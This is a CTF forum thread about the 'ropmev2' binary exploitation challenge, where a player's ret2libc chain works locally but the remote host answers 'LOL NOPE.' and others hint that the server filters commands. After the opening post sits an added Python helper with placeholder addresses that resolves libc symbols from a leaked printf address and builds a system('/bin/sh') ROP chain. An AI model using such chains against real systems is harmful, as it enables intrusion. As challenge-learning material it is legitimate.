ropmev2 pwn challenge

Hi all,
I’m looking for a hint on what I’m doing wrong on this challenge. I am able to open a shell in the local binary. I adapted the binary to leak the remote printf address and calculate the correct remote libc functions addresses. However no remote shell is spawned and I receive the "LOL NOPE." message.
I am able to use arbitrary strings when I call the local and remote system() libc function. I tried with /bin/bash, /bin/sh, flag, getflag, cat flag.txt, etc... without success. I still receive the string "LOL NOPE."

Do you have any hints? Any help is really appreciated.

Thank you
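The two steps the post describes, turning a leaked printf address into the remote libc's system()/"/bin/sh" addresses and laying those out as a ROP chain, as an added example that is not the original poster's script. It uses only the standard library so it runs offline; every offset, gadget address and padding length in it is a made-up placeholder for illustration, not a value from this challenge or any particular libc.

```python
"""ret2libc helper for a 64-bit target: resolve libc symbols from a leak and
build the [pop rdi; ret][arg][system] chain. Added example, not the
challenge author's or poster's code; all addresses below are hypothetical."""
import struct

# Hypothetical symbol offsets inside libc. For a real target take them from
# the remote libc build (readelf -s libc.so.6 for symbols,
# strings -tx libc.so.6 | grep /bin/sh for the string). Made-up values here.
LIBC_OFFSETS = {
    "printf": 0x064E80,
    "system": 0x04F550,
    "/bin/sh": 0x1B3E1A,
}


def p64(value):
    """Pack an address as 8 little-endian bytes (same as pwntools' p64)."""
    return struct.pack("<Q", value)


def libc_base_from_leak(leaked_printf, printf_offset=LIBC_OFFSETS["printf"]):
    """Derive the libc load base from a leaked printf address.

    libc is mmap'd on a page boundary, so a base that is not 0x1000-aligned
    means the offset table does not match the remote libc version; this is
    the first check to make when a chain works locally but not remotely."""
    base = leaked_printf - printf_offset
    if base & 0xFFF:
        raise ValueError(f"libc base {base:#x} is not page aligned: wrong libc offsets?")
    return base


def resolve_libc(leaked_printf, offsets=LIBC_OFFSETS):
    """Rebase every entry of the offset table on the leaked libc."""
    base = libc_base_from_leak(leaked_printf, offsets["printf"])
    return {name: base + off for name, off in offsets.items()}


def build_ret2libc_chain(padding, pop_rdi_ret, arg_addr, system_addr, ret_gadget=None):
    """Lay out [padding][ret][pop rdi; ret][arg_addr][system_addr].

    ret_gadget (a bare 'ret') re-aligns rsp to 16 bytes before the call;
    without it system() can fault on a movaps inside glibc. arg_addr can be
    libc's "/bin/sh" or any string you control in memory. A chain containing
    0x0a would be truncated by a gets()/fgets()-style read, so reject it."""
    chain = b"A" * padding  # hypothetical distance from buffer to saved rip
    if ret_gadget is not None:
        chain += p64(ret_gadget)
    chain += p64(pop_rdi_ret) + p64(arg_addr) + p64(system_addr)
    if b"\n" in chain:
        raise ValueError("newline byte in chain: a line-based read would truncate it")
    return chain


if __name__ == "__main__":
    # Constructed leak: printf sitting at a hypothetical page-aligned libc base.
    leaked_printf = 0x7FFFF7E29E80
    syms = resolve_libc(leaked_printf)
    for name, addr in syms.items():
        print(f"{name:8s} -> {addr:#x}")
    # Hypothetical gadget addresses in a non-PIE binary and a 72-byte padding.
    chain = build_ret2libc_chain(72, 0x401234, syms["/bin/sh"], syms["system"],
                                 ret_gadget=0x40101A)
    print(chain.hex())
```

If the resolved addresses are right but the remote still misbehaves, the thread's advice applies: the chain is not the only thing being checked on the server side, so verify the leak, the libc offsets and the stack alignment before assuming the payload layout is wrong.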

Comments

  • Think outside the box.
    You are getting that message because ..?
    Programmer knew you are gonna try ret2plt. He also knew you are gonna use that /bin/sh string address you leaked.
    You are getting LOL NOPE. message.
    So you can assume, that /bin/sh is not the real shell you want it to be.

    fasetto

  • @fasetto said:

    Think outside the box.
    You are getting that message because ..?
    Programmer knew you are gonna try ret2plt. He also knew you are gonna use that /bin/sh string address you leaked.
    You are getting LOL NOPE. message.
    So you can assume, that /bin/sh is not the real shell you want it to be.

    yeah you got that right

    R4J

  • Thank you for the hint. Finally I did it!

  • I used the r***() function in ROP, but can't get any shell, I get EOF. Help please in PM, thanks

    peek

  • ok done

    peek

  • @fasetto said:

    Think outside the box.
    You are getting that message because ..?
    Programmer knew you are gonna try ret2plt. He also knew you are gonna use that /bin/sh string address you leaked.
    You are getting LOL NOPE. message.
    So you can assume, that /bin/sh is not the real shell you want it to be.

    I just solved it (Using some obscure way cause it didn't cross my mind that they were just filtering certain elements)
    Anyway: Does anyone know how the filter was implemented? I couldn't find it in the executable (Which may be due to my mediocre RE skills), or is it done any other way? Just curious where the LOL NOPE came from

  • @Galile0 said:

    @fasetto said:

    Think outside the box.
    You are getting that message because ..?
    Programmer knew you are gonna try ret2plt. He also knew you are gonna use that /bin/sh string address you leaked.
    You are getting LOL NOPE. message.
    So you can assume, that /bin/sh is not the real shell you want it to be.

    I just solved it (Using some obscure way cause it didn't cross my mind that they were just filtering certain elements)
    Anyway: Does anyone know how the filter was implemented? I couldn't find it in the executable (Which may be due to my mediocre RE skills), or is it done any other way? Just curious where the LOL NOPE came from

    if you got a shell, some commands return LOL NOPE, it's not from the binary

    peek

  • edited August 2019

    @Galile0 said:
    Anyway: Does anyone know how the filter was implemented? I couldn't find it in the executable (Which may be due to my mediocre RE skills), or is it done any other way? Just curious where the LOL NOPE came from

    While I haven't finished this challenge yet, I think you can figure out the filter if you compare a known input, say the alphabet, with what you'll actually end up with if you don't pass DEBUG.

    Edit: After re-reading your message I may have misunderstood and you were instead referring to the filtering of allowed commands on the remote host. Nevermind the above :wink:

  • Ok, that was a fun challenge. Though I felt quite laughed at when getting the LOL NOPE.

  • all done. ez pz. hit me up if you need help. don't worry, it's pretty straightforward.

  • @budyackey said:

    all done. ez pz. hit me up if you need help. don't worry, it's pretty straightforward.

    some tips :smile:

  • Hello,
    Same here i'm stuck with this LOL NOPE message... any hints ? (feel free to PM)

  • I am stuck but feel quite close to the solution if someone could drop me a PM

  • got it to work locally but getting EOF on remote... any hints? pls PM me :)

  • edited October 2019

    Could someone PM me on Discord please, I am stuck at LOL NOPE on the server,
    secret#6195

  • (without giving away too many hints) Ugh.. need a nudge here.. (never done a BO from scratch) got the program figured out, and "what" I need to do to get the BO to trigger.. I'm just not sure how to get the right format of the proper stack "command" to put in the right location to get it to run what I want it to run ;) anyone who knows a bit more about BOs can help me .. I'm using r*****2 (c**** does not work properly on my machine)

  • If I just knew what system() does, I could probably figure this one out. If only there was some kind of man-ual that could tell me...
  • Yes. finally did it!

    I got it without using the PLT, only used functions in the binary. So a bit confused seeing people talk about leaking above.

    I might have missed something really obvious though, as I'm a noob with PLT & dynamic stuff. So if anyone who did it this way could PM me their logic, I would much appreciate it :)
